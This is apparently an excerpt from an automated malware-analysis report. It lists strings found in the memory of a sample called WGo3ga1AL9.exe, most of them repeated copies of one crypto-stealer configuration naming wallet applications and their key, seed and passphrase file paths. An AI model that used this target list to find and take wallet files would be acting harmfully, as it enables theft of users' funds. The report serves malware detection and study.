                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: com.esalnuvol\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*co
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
